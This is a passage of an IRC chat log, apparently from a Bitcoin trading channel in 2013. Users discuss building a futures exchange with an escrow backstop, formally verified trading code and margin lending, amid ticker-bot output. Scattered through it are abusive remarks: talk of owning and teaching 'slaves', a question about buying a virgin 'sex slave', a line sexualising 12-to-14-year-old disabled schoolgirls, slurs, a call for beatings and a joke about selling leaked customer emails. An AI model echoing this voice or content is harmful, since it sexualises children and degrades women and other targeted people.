exchange, but I do not wish to be paid for it. Apr 05 14:42:21 ThickAsThieves yes, that, plus, you can't sanely rely on the end result working. Apr 05 14:43:06 mircea_popescu: this is part of what I consider my "free work". Some people do a finance internship. I will build an exchange. Apr 05 14:43:33 cads: haskell would be a bad idea. only a few people in the world would be able to read it Apr 05 14:43:56 "free work", of course, is not work I do for free, but work I do to increase my public reputation in ways beyond what normal allowances of authority would give. Apr 05 14:44:00 [HAVELOCK] [VTX] 1 @ 0.445 BTC [-] Apr 05 14:44:05 lol haskell Apr 05 14:44:14 hey, haskell is kinda cool Apr 05 14:44:28 try erlang Apr 05 14:44:31 someone was trying to port bitcoin-qt to haskell Apr 05 14:44:35 cads yeah well, most people don't dop internships on opm Apr 05 14:45:15 so the most reasonable thing to do is set a clear sum of your own pocket aside as guarantee (10 btc, .5 btc, w/e) Apr 05 14:45:19 and limit trades to that. Apr 05 14:45:36 and put a plain warning in the about file, this is what this is. Apr 05 14:45:47 Scrat: I agree writing the code in haskell would make the software obscure. However I know a number of derivatives design and valuation packages that run in haskell. Haskell has great support for financial contracts. Apr 05 14:46:12 as long as you're learning you can use anything you want. Apr 05 14:46:14 use fortran Apr 05 14:46:16 Speculatively, haskell provides a direct path for producing code that is verified mathematically correct Apr 05 14:46:48 ;;ticker Apr 05 14:46:49 BTCUSD ticker | Best bid: 138.47700, Best ask: 138.50000, Bid-ask spread: 0.02300, Last trade: 138.50000, 24 hour volume: 68834.52654232, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 135.21438 Apr 05 14:47:02 ;;asks 139.94 Apr 05 14:47:04 There are currently 1842.3181 bitcoins offered at or under 139.94 USD, worth 256753.041292 USD in total. | Data vintage: 0.0014 seconds Apr 05 14:47:05 only languages that are harder to use than haskell offer this feature. Language such as Agda II, Cayenne, bitc, or Coq. Apr 05 14:47:14 and yes, I said Coq :P Apr 05 14:47:17 ;;bids 135 Apr 05 14:47:17 There are currently 2698.3713 bitcoins demanded at or over 135.0 USD, worth 365396.597563 USD in total. | Data vintage: 13.2939 seconds Apr 05 14:48:26 ;;asks 149 Apr 05 14:48:26 There are currently 17923.011 bitcoins offered at or under 149.0 USD, worth 2583454.10924 USD in total. | Data vintage: 82.4161 seconds Apr 05 14:50:05 there it goes 3224 namecoins for 24 btc Apr 05 14:50:06 lol Apr 05 14:52:04 mircea_popescu: I am a mathematician, not a coder, so I don't expect this project to succeed without some serious help. I have the whole #haskell community. I have 5 years of haskell. I can use ruby, python, php etc for frontend. I will rework my ideas on attribution and profit share (it may be best to arrange that I profit financially from a successful completion). Will this be a project you can provide moral support to? Apr 05 14:53:03 mircea_popescu: aside from moral support and guidance, I will ask questions about how the mpex was implemented. Apr 05 14:53:45 This is all. I do not expect more than an hour each week of interspersed conversation. About as much as we've talked already, in fact. Apr 05 14:54:39 in fact, I think I'm happy with your proposed offering of whatever I can pick up in here. Apr 05 14:55:09 could he use a non-turing complete forth-like scripting language? Apr 05 14:55:12 jk Apr 05 14:55:57 eventually when I can model arbitrary contracts, they will be implemented as a non-turing complete contract-composition syntax Apr 05 14:56:57 MJR, I will be following the classical "Composing Contracts" paper: http://contracts.scheming.org/ Apr 05 14:57:50 kewl Apr 05 14:58:24 i was just drawing a parallel to the scripting aspect of bitcoin transactions Apr 05 14:58:36 cads those you certainly aren't getting answered. Apr 05 14:58:51 but i got my backend exhchange stuff working...step one is complete Apr 05 15:00:56 if you think about it, this is proprietary sowftware which constitutes the main tangible asset of a corp mkt-valued at about a hundred million dollars. Apr 05 15:01:18 mpex? Apr 05 15:01:21 yea Apr 05 15:01:24 nice Apr 05 15:02:12 mircea_popescu: sounds like a reasonable protection Apr 05 15:03:23 there's parts about mpex that are very open, such as for instance the use of gpg to protect orderflow Apr 05 15:03:28 Also, as I intend to publicly document each step of the process, and then release the result for free to whoever wishes to provide starting reserve capital, I understand I will get ridiculed Apr 05 15:03:32 or some parts of the server architecture Apr 05 15:03:44 these are well documented on trilema, and i'm pushing people to adopt them Apr 05 15:04:00 (people, being donkeys, know better, so they continue getting owned a la coinbase) Apr 05 15:05:25 sold coinbase mail DB PM for offer Apr 05 15:05:58 :trollface: Apr 05 15:06:08 10ltc Apr 05 15:06:25 :D Apr 05 15:07:19 what's moral support in your definition ? Apr 05 15:10:24 mircea_popescu: I believe that what a student can do greatly increases even by having a teacher that says 'it is possible'. Moral support means philosophical and encouragement. It would mean a great deal to have whatever positive, constructive input you wish to provide. When we provide others with moral support, we do it only so far as it helps our reputation or internal sense of gratification at having helped someone. Apr 05 15:11:02 a, that's a different beast. Apr 05 15:11:11 it certainly possible to build a ltc/btc futures market. Apr 05 15:11:42 unless you're pointedly an idiot about it, it's going to be useful, too. Apr 05 15:12:09 the other definition of moral support however is as to third parties. you can't go around saying "i'm working with mp on this" unless we actually have a deal of some sort. Apr 05 15:13:04 mircea_popescu: I would certainly keep you on the anonymous gratitude lisk Apr 05 15:13:17 even up to what we've talked already Apr 05 15:13:33 basically stressing the difference between "endorsement" and "encouragement" Apr 05 15:13:39 precisely Apr 05 15:13:41 something like that. Apr 05 15:13:56 I do not wish to profit from recieving your public endorsement, no. Apr 05 15:14:22 it's not a crime, it's business. stuff i sign off on does better in the marketplacer Apr 05 15:14:24 any private friendship will be repayed in kind to my social network. Apr 05 15:14:30 s.bbet being probably the shiniest example. Apr 05 15:14:34 I believe I am creating this exchange as a gift to the community Apr 05 15:14:50 but anyway : deprived is one fellow actively doing some ltc/btc futures stuff, tho mostly otc. Apr 05 15:14:51 now you are getting on shaky territory Apr 05 15:15:16 I do not wish to profit from it in ways other than 1) public reputation if I succed, and 2) transferrable skills regardless of whether I fail or succeed. Apr 05 15:15:18 its funny but "altruism" engenders less trust than profit Apr 05 15:15:28 I agree Apr 05 15:15:37 those should be positive side effects of a workable sustainable plan Apr 05 15:16:14 yeah, this entire "make a gift to the community" thing is suspect. Apr 05 15:16:25 hehehe, i knew thats what you would say Apr 05 15:16:26 doing a general "this is how a successful business is made" documentary thing is one thing. Apr 05 15:16:35 but when taaki stole and "released" the bitcoinica code Apr 05 15:16:44 the only result was some even worse idiots made bitfinex. Apr 05 15:17:06 there's no real benefit in making an open source thing the general public may confuse with a financial market to their detriment. Apr 05 15:17:26 empowering people to run nuclear power plants in their garage is not a good thing Apr 05 15:17:42 mircea_popescu: I have already been advised once that for the project to succeed and be safe and beneficial long term. Apr 05 15:17:49 hmmm...great idea...but can we sell that? Apr 05 15:18:05 (garage based nuclear power) Apr 05 15:18:05 I am starting to change my opinion, due to the 'trust' argument Apr 05 15:18:44 WTS G.SDICE,G.MPOE,G.BBET,BTCQuick :) pm me with offer Apr 05 15:19:01 mircea_popescu: this is where this community's advice is already coming in handy. Apr 05 15:19:06 I can see reason. Apr 05 15:19:39 If I have to set myself up to financially benefit, and hold the new company as a private organization, I will Apr 05 15:19:42 point is, people can't calculate your ephemeral motives, hence they can't arrive at the same conclusions...if based on clear mathematical profit model, they can arrive at the same conclusions and see the benefits Apr 05 15:20:13 cads you can run it as a strictly limited operation. Apr 05 15:20:16 people trust that other people will do whats in their own self interest Apr 05 15:20:19 of course, whether I give my income to charity will be a private decision then. My inventive to serve the project honestly will come from that. Apr 05 15:20:29 "i am doing this to learn, it's not for serious, i have 10 btc set in escrow with X if site fucks up" Apr 05 15:20:32 that also works. Apr 05 15:20:38 Yes. Apr 05 15:20:39 may be more adequate for what you want. Apr 05 15:20:57 I think that would be a suitable initial offering. Apr 05 15:21:09 The high level bells and whistles will come in later iterations. Apr 05 15:21:14 publish your total exposure/don't let people expose you over that sumand that'sthat. Apr 05 15:21:16 i think that mpex's model is great...what if x, x', x'' and x''' happen Apr 05 15:21:29 if you blow up escrow saves you, and you will be the first failed bitcoin business that failed correctly. Apr 05 15:21:43 would be worth failing just for that. Apr 05 15:21:50 That would be extremely valuable to me, even as a failure. Apr 05 15:21:55 well to everyone. Apr 05 15:22:11 shows you had the sense to a. ask b. think through c. implement something safe. Apr 05 15:22:13 big deal. Apr 05 15:22:31 Certainly Apr 05 15:22:49 very well, I am optimistic about this response Apr 05 15:22:55 and in general i've always supported stuff that was made to be safe. Apr 05 15:23:07 my girl regularly roils over things that calously put the public in grave danger Apr 05 15:23:12 for minor benefits of the "entrepreneur" Apr 05 15:23:46 just not a sustainable model. Apr 05 15:24:36 my eventual goal is attain skills needed to write 1) a mathematical specification of a secure trading 2) a program that is provably correct relative that specification Apr 05 15:24:51 secure trading platform* Apr 05 15:25:42 cads you ever seen the Apr 05 15:25:43 hm where isi t Apr 05 15:25:44 this is a level of rigor that a few years ago produced L4-Verified, the world's first mathematically correct unix micro-kernel Apr 05 15:25:55 http://trilema.com/2012/probably-the-hottest-business-idea-of-the-moment-in-btc/ Apr 05 15:26:56 if you can actually build a business on that model for instance, i'd certainly list it. Apr 05 15:28:05 that looks awesome Apr 05 15:28:17 and it is in some ways a "futures" hedge on code Apr 05 15:28:42 never cease to amaze me Apr 05 15:28:51 mircea_popescu: though I would be thrilled to offer that, frankly I would need 5 years of software dev manager work before I could assemble and run such a team, to completely forget about capital. Apr 05 15:28:53 *slow claps* Apr 05 15:29:06 But yes. That is the type of sector I wish to enter. Apr 05 15:29:11 this is true, just, since we were on the topic of provavbility. Apr 05 15:29:45 yeah, I also believe offering provability services would be a great extension to that model Apr 05 15:30:19 thanks for sharing that, It's going into my business models brainstorming file Apr 05 15:30:52 Okay, I will first brainstorm about a ~10BTC service Apr 05 15:30:56 cads: are you doing this for a dissertation? Apr 05 15:31:11 pgp: I'm not sure if I'm going to remain in school Apr 05 15:31:14 basically there is going to be space for 10k mathematicians and 100k software experts (this is NOT webdevelopers, ruby coders etc) Apr 05 15:31:22 all making great salaries, out of btc. Apr 05 15:31:24 hahaha Apr 05 15:31:28 more jobs than all qe rounds ever created. Apr 05 15:31:36 drop out - start up Apr 05 15:31:42 if I do, then yes, I expect to use topics like this for my masters/phd Apr 05 15:31:55 i always said the power of an idea is the number of people it can make drop out of school. Apr 05 15:32:04 this is why whoredom is such a great thing. Apr 05 15:32:28 but I also have work in applied logic and economics and game theory that is promising Apr 05 15:32:31 i think you can draw a clear parrallel to "crop harvesting" and "code development"...it actually seems like a perfect analogy in some ways Apr 05 15:32:41 this is more of a project to tempt myself to leave school over :D Apr 05 15:32:57 lol Apr 05 15:33:18 I might be overcommitting Apr 05 15:33:29 but I should certainly be able to push up a _small_ service Apr 05 15:33:57 I am also recruiting investors for a 3d printing business I'd like to help my brother set up Apr 05 15:34:03 one of the advantages of the 10btc backstop is that it disencentivises overengineering Apr 05 15:34:08 it is, after all, 10 btc. Apr 05 15:34:12 yep! :D Apr 05 15:34:23 that's a genius architecture decision Apr 05 15:34:34 I have no problem refactoring the code to scale it Apr 05 15:34:37 yeah, it's kinda why i make a lot of money consulting. Apr 05 15:35:30 mircea_popescu: I tend to give my best advice without knowing it to friends, lol. And less good advice to my consutancy. Apr 05 15:35:39 something I ought to change. Apr 05 15:35:59 i've never noticed such Apr 05 15:37:17 well to give an example I helped a friend for free to learn inequalities. Helped me breakthrough a new way to teach inequalities. Spent a couple hours. On the other hand, I charge so much for tutoring that my students often can't afford two hour stretches. Apr 05 15:37:39 and that's where I find the real breakthroughs happen Apr 05 15:37:48 Really the solution is become a better tutor. Apr 05 15:37:58 this is not quite the consulting capacity. Apr 05 15:38:03 i only teach slaves these days, pretty much. Apr 05 15:38:26 ;;ticker Apr 05 15:38:26 haha, aka employees? Apr 05 15:38:29 BTCUSD ticker | Best bid: 136.50501, Best ask: 136.94999, Bid-ask spread: 0.44498, Last trade: 136.94999, 24 hour volume: 67129.13784366, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 135.15683 Apr 05 15:38:44 no, no. Apr 05 15:38:54 [BTCTC] [COGNITIVE] 2 @ 0.15789 = 0.3158 BTC [+] Apr 05 15:39:08 http://trilema.com/2010/nsfw-mosu-cu-joarda/ aka slaves. Apr 05 15:41:54 [MPEX] [S.MPOE] 17150 @ 0.00069535 = 11.9253 BTC [-] Apr 05 15:41:56 [MPEX] [S.MPOE] 1500 @ 0.00068933 = 1.034 BTC [-] Apr 05 15:42:37 ;) Apr 05 15:44:00 http://blockchain.info/address/1JqjoFF8QZwidrTbfnihGHDeu16pbLia1q < ver's shop inbound addy Apr 05 15:44:03 total sales, 4k Apr 05 15:44:05 why so low ?! Apr 05 15:46:10 [MPEX] [S.MPOE] 9700 @ 0.00070686 = 6.8565 BTC [+] Apr 05 15:50:36 ;;ticker Apr 05 15:50:37 BTCUSD ticker | Best bid: 136.50206, Best ask: 136.95000, Bid-ask spread: 0.44794, Last trade: 136.50206, 24 hour volume: 63557.73550732, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 134.88219 Apr 05 15:52:02 only teach slaves eh mp? what is the going rate for a virgian romanian sex slave? (female) Apr 05 15:52:34 i don't buy em. Apr 05 15:52:37 that's kinda the entire point. Apr 05 15:53:07 gifts? Apr 05 15:53:27 or just dont has? Apr 05 15:54:00 if i would be making dollars available, for you to buy bitcoins with - how much would pay for it? 1% per day on the amount I lend? Apr 05 15:54:03 ltc correct a bit, anyone know when gox is going to list them? Apr 05 15:54:29 ill pay 1% a day says pirateat40 Apr 05 15:55:03 1% a day sounds about right... Apr 05 15:55:16 1% a day ?! what ?! Apr 05 15:55:27 ;;calc 1.01**365 Apr 05 15:55:27 37.7834343329 Apr 05 15:55:37 what exactly are you doing for 3778% apr Apr 05 15:55:38 margin lending on buying BTC... Apr 05 15:55:47 pirateat40 paid 1% a day:) Apr 05 15:55:53 no, he didn't. Apr 05 15:55:56 he said he would. Apr 05 15:55:58 that's usually what it is over at bitfinex Apr 05 15:55:59 different story. Apr 05 15:56:08 he did for almost a year:) Apr 05 15:56:18 using bitfinex is like swimming in the east river. Apr 05 15:56:21 then the sec, lulz Apr 05 15:57:00 448167.3 USD in outstanding margin loans at weighted averae of 224.08% Apr 05 15:57:24 but really, who wants fiat? Apr 05 15:58:08 ;;bids 0 Apr 05 15:58:09 There are currently 31116429 bitcoins demanded at or over 0.0 USD, worth 11492698.8359 USD in total. | Data vintage: 101.1584 seconds Apr 05 15:58:16 ;;ticker Apr 05 15:58:17 BTCUSD ticker | Best bid: 136.61003, Best ask: 136.95000, Bid-ask spread: 0.33997, Last trade: 136.95000, 24 hour volume: 61707.94188656, 24 hour low: 128.00100, 24 hour high: 141.95999, 24 hour vwap: 134.66885 Apr 05 15:58:21 how much of the rate is time value of USD vs BTC and how much of it is risk premium of letting those guys hold your USD? Apr 05 15:58:28 11 million in bids, nice Apr 05 15:59:01 stable btc, even nicer. Apr 05 15:59:10 rock seems to be refuling, i bet next week is a nice jump again (assuming no massive crash on the weekend) Apr 05 15:59:13 yeah its very stable compared to 2 days ago, i like it a lot Apr 05 15:59:16 two days. this clearly proves btc is not a bubble. Apr 05 15:59:31 :) Apr 05 15:59:49 ltc was over $5 for two days lol Apr 05 15:59:57 it crashed quit a bit Apr 05 16:00:13 i heard some guy dumped 25% of his btc, and made 600k - you think thats a smart move to get out 25% of your stash right now? Apr 05 16:00:33 i sold 25% of my ltc for btc, then sold that into cash Apr 05 16:00:51 but im not selling my btc stash Apr 05 16:00:59 not until 850ish Apr 05 16:01:06 and then only 10 to 25% Apr 05 16:01:08 gotta live... and life still runs on fiat... Apr 05 16:01:27 mircea_popescu: ah, those kinds of slave. And they have so much to learn I can understand why teaching anyone else might be low priority. Apr 05 16:01:29 ltc just up 10,000% in 2 months i was like, yeah time to lock in profits Apr 05 16:01:42 in case of ltc i can't blame you Apr 05 16:02:05 i had way more than anyone should have, i got lucky Apr 05 16:02:50 cads moreover, it resolves the "can't afford to pay" issue nicely. Apr 05 16:03:02 but you said you were probably the unluckiest chap in bitcoin_ Apr 05 16:03:16 bitesak he changes about weekly. Apr 05 16:03:18 mircea_popescu: they _pay_ for your teaching? Apr 05 16:03:32 cads seeing how i own them already, they don't have to. Apr 05 16:03:58 [HAVELOCK] [HIM] 1 @ 1.919 BTC [+] Apr 05 16:06:02 mircea_popescu: very dark. That always seems like nothing more than a game to me. I think I'd have to develop the ownership mentality to be a really good master. Apr 05 16:06:29 nothing dark about it Apr 05 16:06:38 education doesn't really work under any other paradigm anyway. Apr 05 16:07:20 Yep, if it's not authentic the atmosphere suffers. Apr 05 16:07:33 *shrug* Apr 05 16:08:01 plenty of time to play in that regard when I am entirely more possessed of my own sense of greatness Apr 05 16:08:23 i suspect such a sense is moreover dangerous in that context. Apr 05 16:09:17 a humble master, huh? Apr 05 16:09:25 http://buzz.money.cnn.com/2013/04/05/bitcoin-bubble/?section=money_topstories&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+rss%2Fmoney_topstories+(Top+Stories Apr 05 16:09:44 teh true master, beyond great and humble. Apr 05 16:10:06 Things to learn. In time ;) Apr 05 16:11:35 2nd jgb halt today Apr 05 16:11:39 japan isn't doing too well. Apr 05 16:12:02 [BTCTC] [GSDPT] 2 @ 0.003498 = 0.007 BTC [+] Apr 05 16:12:41 lol japan... Apr 05 16:15:03 http://bitbet.us/bet/376/bfl-will-stop-giving-refunds-on-bitforce-sc/ Apr 05 16:16:21 things will be getting back to normal shortly. Apr 05 16:20:08 what is not normal? (other than japan)? Apr 05 16:26:41 mircea_popescu: this article is great Apr 05 16:26:42 http://nymag.com/news/features/tide-detergent-drugs-2013-1/index1.html Apr 05 16:27:26 "medium of exchange" is the most flexible part of money... Apr 05 16:27:44 i recall reading that exact thing months ago Apr 05 16:28:34 http://forexmagnates.com/bitcoin-denominated-mt4-trading-at-bit4x/ Apr 05 16:29:11 ah, someone talking about bitcoins linked to that, i thought it was very interesting Apr 05 16:30:05 the gall of these people. Apr 05 16:30:17 so coinbase comes up with a warning, against phishing. Apr 05 16:30:37 how did the phishers get the emails ? coinbase leak ? a, we don't mention that. Apr 05 16:31:01 fucking scum at the bottom of the bitcoin pond, these people. Apr 05 16:31:06 https://bitcointalk.org/index.php?topic=167900.0 Apr 05 16:31:14 coinbase is leaking Apr 05 16:32:02 yea Apr 05 16:32:08 funny how the volume spiked at the same time as the ny market opened Apr 05 16:34:03 correlation, US got woke up or got to their desk. Apr 05 16:36:37 i think a lot of this is fund traders doing it on the side Apr 05 16:36:46 hell, who of them would not have heard about btc by now Apr 05 16:36:59 mircea_popescu: http://trilema.com/2012/probably-the-hottest-business-idea-of-the-moment-in-btc/#comment-90935 "That’s a good point, if the codebase is small formal validation would probably be the way to go." Apr 05 16:37:10 ltc juped as well :/ Apr 05 16:37:12 "One major point which the original article neglects to mention is that this proposed business would be an excellent point of crystallization for true IT competence, drawing some actually qualified people in." Apr 05 16:37:24 mircea_popescu: ding ding ding... Apr 05 16:38:07 I think I might have hit on an interesting idea Apr 05 16:43:55 yes, that was my point, is that i think there is increasing volume of people accustomed to a 9:30 EST market opening Apr 05 16:44:24 that would be a good metric to track... Apr 05 16:44:48 to judge the amount of "institutional" or "wall street" interest Apr 05 16:47:40 mircea_popescu: do you have customers in mind for the code review adventure? Apr 05 16:49:06 [BTCTC] [PAJKA.BOND] 2 @ 0.1022 = 0.2044 BTC [-] Apr 05 16:50:02 I'm thinking risk and externalities on the insurance derivative over this kind of service would be _far_ beyond my abilities to manage. However a code review would be quite lucrative and low risk. Also, it might be reasonable to begin offering formal verification services from the gate, or about 1 year after startup. It's not that hard to teach. When you have your own slaves. Apr 05 16:50:07 and I mean employees Apr 05 16:50:28 sex-employees cost too much! Apr 05 16:51:23 The issue I see with formal verification is so few people know to ask for it by name Apr 05 16:52:47 also, I know any number of people that play with the technology _for fun_, but much fewer who have names for themselves (and those guys tend to be happily employed) Apr 05 16:53:18 I've thought about the insurance thing before. I think you'll end up developing pci-type standards and then measuring / certifying the company against those standards Apr 05 16:54:36 http://www.pcicomplianceguide.org/pcifaqs.php Apr 05 16:54:56 mircea_popescu: thanks for that stimulating line of thought, I'm getting some positive feedback from my peers already. Apr 05 16:54:56 throwing in the bone about coding an exchange, too Apr 05 16:54:56 I might see some champing at the bit :) Apr 05 16:55:22 cads> mircea_popescu: do you have customers in mind for the code review adventure? << sure. pretty much any new service opening. Apr 05 16:56:27 optimator i think that direction is pretty much diametrically opposed. Apr 05 16:56:42 how so? Apr 05 16:57:43 let's go by example : the cc industry is pretty much all pci compliant Apr 05 16:58:01 about half the cards in the world are available to download on the black market. Apr 05 16:58:09 the idea is to succeed not to fail here. Apr 05 16:59:08 ah. the issue is pci is broke, not that an open sourced bitcoin security standard would fail Apr 05 16:59:16 but anyway. pci is pretty much marketing fluff. heavy on the blabla and three letter acronims, pompous definitions and posturing. Apr 05 16:59:29 very light on actual anything. which mostly boils down to some penetration testing Apr 05 16:59:36 yes Apr 05 16:59:41 http://www.ertos.nicta.com.au/research/l4.verified/approach.pml Apr 05 16:59:46 sure, but i want to provide insurance to a site. but I'll only insure if they meet some standard. How do you define the standard? individual for each site? Apr 05 17:00:27 a, no, if you read the article/comments it's agreed some standards will have to be arrived at/published Apr 05 17:00:33 this approach is essentially extensible to let us create almost anything needed. Bitcoin asic? Verified. LTC asic? verified. Bitcoin stock exchage? Apr 05 17:00:40 Can I hear "verified"? Apr 05 17:01:10 right - pci, was just a placeholder, for an agreed upon standard Apr 05 17:01:11 this could be the "slightly smoky dragon" certification that i have been asking for... Apr 05 17:01:15 "Stay tuned for the first commercially available, fully formally verified microkernel." Apr 05 17:01:19 what's the news on that btw ? Apr 05 17:01:23 optimator right. Apr 05 17:01:34 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Apr 05 17:01:40 [BTCTC] [ASICMINER-PT] 2 @ 0.748 = 1.496 BTC [-] Apr 05 17:01:42 [BTCTC] [ASICMINER-PT] 1 @ 0.7401 BTC [-] Apr 05 17:01:45 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [-] Apr 05 17:01:47 [BTCTC] [ASICMINER-PT] 8 @ 0.735 = 5.88 BTC [-] Apr 05 17:01:50 my point was that if someone has credibility (mpex) they can call their cert whatever they want, it will have value Apr 05 17:02:18 mircea_popescu: when you realize that this approach takes Coq -> Haskell -> C code, then you see it's about putting Coq in Cunt. Simple. I know ten medium level programmers already dying to be doing this kind of work, even if it was near free. Apr 05 17:02:23 so the double cherry truck and slightly smoky dragon were a joke, but they actually could hold weight now Apr 05 17:02:26 MJR_ well obviously. kinda why those are there, to make that point. Apr 05 17:02:29 The only part is the veracity of our code Apr 05 17:02:39 they weren't entirely a joke. best jokes are half jokes. Apr 05 17:02:45 if we turn out _only_ verified code, our reputation would rise quickly. Apr 05 17:02:46 [BTCTC] [S.DICE-PT] 25 @ 0.0038 = 0.095 BTC [-] Apr 05 17:02:46 kernel of truth Apr 05 17:02:49 [BTCTC] [S.DICE-PT] 11 @ 0.0037 = 0.0407 BTC [-] Apr 05 17:03:01 but it points to certification is only as good as certifier Apr 05 17:03:07 cads don't get overexcited now. Apr 05 17:03:10 in case of mpex...backed by btc Apr 05 17:03:33 dow just dropped 100 Apr 05 17:03:36 [MPEX] [S.DICE] 50 @ 0.00333333 = 0.1667 BTC [+] Apr 05 17:03:37 is now known as down jones Apr 05 17:04:25 !ticker h him Apr 05 17:04:27 [HAVELOCK:HIM] 1D: 1.91900000 / 1.919 / 1.91900000 (2 shares, 3.83800000 BTC), 7D: 1.80000000 / 1.96645135 / 2.08000000 (111 shares, 218.27609996 BTC), 30D: 1.41000000 / 1.8129944 / 2.08000000 (716 shares, 1298.10399240 BTC) Apr 05 17:04:31 oh wow Apr 05 17:04:38 O_O Apr 05 17:04:56 !ticker m ^oix Apr 05 17:04:57 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 93.3570601 / 108.2470225 / 135.80742037 (19613 shares, 8,037.73 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 05 17:05:07 heh Apr 05 17:05:12 i'm seeing bullish sentiment...if you think GLD contracts expiring today struck at 151 are an indicator...those just doubled in value since the open Apr 05 17:05:27 ;;bids 108 Apr 05 17:05:30 There are currently 35595.81 bitcoins demanded at or over 108.0 USD, worth 4409417.03238 USD in total. | Data vintage: 0.0056 seconds Apr 05 17:07:08 hey, anyone got any idea what the precedant is for bets where the conditions become unclear? Apr 05 17:07:10 eg http://bitbet.us/bet/337/bfl-will-deliver-asic-devices-before-may-1st/ Apr 05 17:07:24 eyes not really much precedent. what's unclear there ? Apr 05 17:07:33 the spec on BFL has changed since the bet was made Apr 05 17:07:38 mircea_popescu: *shrug* I do this when I make a connection that turns a deep problem into a resource. You should have seen me years ago each time I realized some little math connection. Apr 05 17:07:46 doesn't matter. spec at the time of the bet being created counts. Apr 05 17:07:52 ok cool Apr 05 17:08:06 thats what i figured but though i would check :D Apr 05 17:08:20 thankyou for quick response! Apr 05 17:08:23 yeh Apr 05 17:08:28 otherwiswe would be too easy Apr 05 17:09:21 boingboing.net/2013/04/04/american-public-schools-in-9-s.html Apr 05 17:09:52 how long till someone makes an ipad app to pinpoint mentally retarded female students aged 12 to 14, not on their period, with big tits ? Apr 05 17:13:17 ;;seen smickles Apr 05 17:13:18 smickles was last seen in #bitcoin-assets 22 hours, 30 minutes, and 47 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 05 17:13:27 ;;ticker Apr 05 17:13:27 BTCUSD ticker | Best bid: 137.00000, Best ask: 137.19000, Bid-ask spread: 0.19000, Last trade: 137.00000, 24 hour volume: 60517.06080753, 24 hour low: 128.00100, 24 hour high: 139.89998, 24 hour vwap: 134.46786 Apr 05 17:13:46 ;;later tell smickle pm me when you get the chance Apr 05 17:13:46 The operation succeeded. Apr 05 17:14:02 ;;market sell 100000 Apr 05 17:14:05 A market order to sell 100000 bitcoins right now would net 9458202.1355 USD and would take the last price down to 41.1000 USD, resulting in an average price of 94.5820 USD/BTC. | Data vintage: 0.0044 seconds Apr 05 17:14:16 ;;market sell 200000 Apr 05 17:14:17 A market order to sell 200000 bitcoins right now would net 11368941.2316 USD and would take the last price down to 7.6000 USD, resulting in an average price of 56.8447 USD/BTC. | Data vintage: 11.6483 seconds Apr 05 17:14:30 mircea_popescu: as long as american public doesn't know to invest in in policies and products that help identity management and security, shit like this will keep happening. Apr 05 17:14:39 cads it's an outrage tho. Apr 05 17:14:52 mircea_popescu: In America, remember, privacy is 'dirty'. Apr 05 17:14:54 A sin. Apr 05 17:15:05 collectivist swamp you got going there. Apr 05 17:15:34 makes us all wanna move to romania Apr 05 17:15:40 'People do naughty things in private!' It's only barely dawning on us that privacy protects you from disgusting things. Apr 05 17:16:25 Have you guys read about Identiti? Apr 05 17:16:31 mircea_popescu: Simona is at the bank, how do I say this phrase. what is is again, ce froumaousa esti? Apr 05 17:16:41 ce frumoasa esti. Apr 05 17:16:56 how does that sound? Apr 05 17:17:05 mkay lesee Apr 05 17:17:34 Identifi* http://www.rvl.io/mmalmi/identifi Apr 05 17:18:14 thestringpuller http://www.youtube.com/watch?v=vuCPqiLNeIU Apr 05 17:18:20 It is a proposed complete identity database that will collect all available data on all humans. Get this. For the purpose of leading to a gift economy. Apr 05 17:18:21 first few syllables. "ce frumoasa esti" Apr 05 17:18:57 cads the retards re-re-re-inventing a broken version of pgp Apr 05 17:18:59 [HAVELOCK] [SDICE] 1 @ 0.36499999 BTC [-] Apr 05 17:19:04 i'm so sick of this bullshit Apr 05 17:19:19 and of the "start-up" freakshow in general. Apr 05 17:19:41 it's much worse in btc land Apr 05 17:19:58 [HAVELOCK] [SDICE] 1 @ 0.365 BTC [+] Apr 05 17:20:14 cads, truly fascinating ideas... but i propose to have btc code formally verified first Apr 05 17:20:22 mircea_popescu: worse than that. They want judges to be voted on by a peer network. If the network doesn't like the judge's decision, they can vote another judge. The idea is that people found guilty of crimes will become universally shunned. Apr 05 17:20:33 orly. Apr 05 17:20:44 because what the public thinks matters. Apr 05 17:20:56 the us population < 40 is in dire need of regular weekly beatings Apr 05 17:20:56 as if! Apr 05 17:20:59 [HAVELOCK] [HIM] 2 @ 1.919 = 3.838 BTC [+] Apr 05 17:21:17 the public _thinks_ its opinion matters, and that's what is important. Apr 05 17:21:30 mircea_popescu: lol Apr 05 17:21:36 Such a system would be so easy to influence it would be ridiculous. Apr 05 17:21:37 yeah, i've enjoyed showing better a large swath of variouses since btc. Apr 05 17:21:55 jurov ya that'll be the day. Apr 05 17:22:08 jurov: you think the BTC devs would like that? Apr 05 17:22:19 *chuckles* Apr 05 17:22:23 haha Apr 05 17:22:35 joeykrim hey, still there ? Apr 05 17:22:51 maybe I start my own coin Apr 05 17:22:54 the mathcoin :P Apr 05 17:22:57 yea making proven correct altchain would be prolly easier Apr 05 17:23:00 stop starting things. Apr 05 17:23:04 perfectly verified code base :D Apr 05 17:23:16 you should use haskell Apr 05 17:23:38 he should use bitc and name the service oink Apr 05 17:24:38 oink like the bittorrent tracker? Apr 05 17:25:13 [BTCTC] [BASIC-MINING] 11 @ 0.39 = 4.29 BTC [+] Apr 05 17:25:28 bitcoink the bitc whatever Apr 05 17:27:20 ;;asks Apr 05 17:27:21 (asks [--over] ) -- Calculate the amount of bitcoins for sale at or under . If '--over' option is given, find coins or at or over . Apr 05 17:27:25 deadweasel 4. Use multiple bets to get more of the wiinings 'weight' << hiow;s that work ? Apr 05 17:28:49 [BTCTC] [ASICMINER-PT] 1 @ 0.774 BTC [+] Apr 05 17:29:09 seconds] Apr 05 17:29:09 10:24:44 < thestringpuller> oink like the bittorrent tracker? Apr 05 17:29:44 i figure multiple bets each get a chunck of weight, so if you split up, maybe get more weight? Apr 05 17:30:05 nope Apr 05 17:30:42 betting 4BTC at is the same result as 4 bets 1 btc each, all weights equal Apr 05 17:30:54 [BTCTC] [COGNITIVE] 1 @ 0.15789 BTC [+] Apr 05 17:30:58 yeah. Apr 